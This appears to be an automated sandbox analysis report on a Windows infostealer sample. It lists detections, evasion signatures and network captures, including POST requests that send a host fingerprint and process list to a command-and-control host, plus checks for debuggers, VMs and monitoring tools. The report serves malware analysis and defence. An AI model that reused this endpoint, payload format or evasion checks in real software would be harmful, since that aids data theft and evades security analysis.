
Windows Analysis Report
2M43DSi2cx.exe

Overview

General Information

Sample name: 2M43DSi2cx.exe (renamed because the original name is a hash value)
Original sample name: 98f2f2f0d74571af72dd4ca43c1692bf.exe
Analysis ID: 1578929
MD5: 98f2f2f0d74571af72dd4ca43c1692bf
SHA1: 507cac98014412c6e697ea75f3c1941bad57df48
SHA256: dfe46285484362af5dc63dd0bba5de89c1c1d7105f7e8d05b2514fa39ac3750a
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • 2M43DSi2cx.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\2M43DSi2cx.exe" MD5: 98F2F2F0D74571AF72DD4CA43C1692BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched


AV Detection

barindex
Source: 2M43DSi2cx.exe | Avira: detected
Source: 2M43DSi2cx.exe | Virustotal: Detection: 51%
Source: 2M43DSi2cx.exe | ReversingLabs: Detection: 42%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 2M43DSi2cx.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: -----BEGIN PUBLIC KEY----- | 0_2_0044DCF0
Source: 2M43DSi2cx.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [ebp+04h], 424D53FFh | 0_2_0048A5B0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [edi+04h], 424D53FFh | 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [esi+04h], 424D53FFh | 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: mov dword ptr [ebx+04h], 424D53FFh | 0_2_0048B560
Source: 2M43DSi2cx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0042255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses | 0_2_0042255D
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004229FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle | 0_2_004229FF
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 501222 | Data Raw (truncated in the report): 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 36 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3 | Data Ascii (decoded from the raw bytes above; truncated where the capture ends): { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": 
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 143 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: Joe Sandbox View | IP Address: 34.226.108.155
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (listed 6 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004EA8C0 recvfrom | 0_2_004EA8C0
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknown | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 501222 | Data Raw: same truncated 501222-byte JSON payload (host fingerprint and process list) as the global-traffic POST to home.fivetk5ht.top listed earlier in this report
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: 2M43DSi2cx.exe, 00000000.00000003.1414353733.0000000001500000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514
Source: 2M43DSi2cx.exe, 00000000.00000002.1425461490.00000000014B7000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414372045.00000000014B5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798514fd4
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: 2M43DSi2cx.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: 2M43DSi2cx.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: 2M43DSi2cx.exe | String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713

System Summary

barindex
Source: 2M43DSi2cx.exe | Static PE information: section name: (empty)
Source: 2M43DSi2cx.exe | Static PE information: section name: .idata
Source: 2M43DSi2cx.exe | Static PE information: section name: (empty)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_01519571 (listed 6 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_014C8994 (listed 2 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004305B0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00436FA0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0045F100
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004EB180
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007AE030
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004F00E0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00486210
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004EC320
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00774410
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004F0420
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0042E620
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004EC770
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00786730
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0048A7F0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007A4780
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00434940
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0042A960
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004DC900
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_005F6AC0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_006DAAC0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_005B4B60
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_006DAB2C
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00798BF0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0042CBB0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007ACC70
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007A4D40
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_005E0D80
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0079CD80
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0073AE30
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00444F70
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004EEF90
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004E8F90
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00772F90
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004310E6
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0078D430
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007935B0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007B1780
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004D9880
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00779920
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007A3A70
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00461BE0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00791BD0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00787CC0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_006D9C80
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00435DB0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00433ED0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_00445EB0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007A9FE0
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 004275A0 appears 710 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 00464F40 appears 348 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 005D7220 appears 103 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 00465340 appears 50 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 00464FD0 appears 289 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 005044A0 appears 76 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 004650A0 appears 101 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 0043CD40 appears 80 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 0042CAA0 appears 64 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 004271E0 appears 47 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 0043CCD0 appears 55 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 005FCBC0 appears 104 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 0042C960 appears 37 times
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: String function: 004273F0 appears 114 times
Source: 2M43DSi2cx.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 2M43DSi2cx.exe | Static PE information: Section: zicceeoj ZLIB complexity 0.9945489857763453
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_0042255D GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses | 0_2_0042255D
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004229FF FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle | 0_2_004229FF
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | File read: C:\Windows\System32\drivers\etc\hosts (listed 3 times)
Source: 2M43DSi2cx.exe | Virustotal: Detection: 51%
Source: 2M43DSi2cx.exe | ReversingLabs: Detection: 42%
Source: 2M43DSi2cx.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 2M43DSi2cx.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Section loaded: kernel.appcore.dll
Source: 2M43DSi2cx.exe | Static file information: File size 4483072 > 1048576
Source: 2M43DSi2cx.exe | Static PE information: Raw size of (unnamed section) is bigger than: 0x100000 < 0x284c00
Source: 2M43DSi2cx.exe | Static PE information: Raw size of zicceeoj is bigger than: 0x100000 < 0x1be000

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Unpacked PE file: 0.2.2M43DSi2cx.exe.420000.0.unpack | section rights after unpacking: (unnamed):EW; .rsrc:W; .idata:W; (unnamed):EW; zicceeoj:EW; xmbctvay:EW; .taggant:EW | vs. on disk: (unnamed):ER; .rsrc:W; .idata:W; (unnamed):EW; zicceeoj:EW; xmbctvay:EW; .taggant:EW
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: 2M43DSi2cx.exe | Static PE information: real checksum: 0x455408, should be: 0x448350
Source: 2M43DSi2cx.exe | Static PE information: section name: (empty)
Source: 2M43DSi2cx.exe | Static PE information: section name: .idata
Source: 2M43DSi2cx.exe | Static PE information: section name: (empty)
Source: 2M43DSi2cx.exe | Static PE information: section name: zicceeoj
Source: 2M43DSi2cx.exe | Static PE information: section name: xmbctvay
Source: 2M43DSi2cx.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_0152D0DF push eax; iretd | 0_3_0152D3F5 (listed 9 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_0151507A push eax; ret | 0_3_01515099 (listed 6 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_0151260B push ebp; retf 0003h | 0_3_0151260C (listed 6 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_01516F23 pushfd; iretd | 0_3_01516F6A (listed 6 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_3_014CC158 push esi; retn 0047h | 0_3_014CC15A (listed 2 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_007A41D0 push eax; mov dword ptr [esp], edx | 0_2_007A41D5
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Code function: 0_2_004A2340 push eax; mov dword ptr [esp], 00000000h | 0_2_004A2343
Source: 2M43DSi2cx.exe | Static PE information: section name: zicceeoj entropy: 7.954541903209299

Boot Survival

barindex
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Window searched: window name: FilemonClass (listed 2 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Window searched: window name: PROCMON_WINDOW_CLASS (listed 3 times)
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\2M43DSi2cx.exe | Window searched: window name: Filemonclass

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: PROCMON.EXE
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: X64DBG.EXE
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: WINDBG.EXE
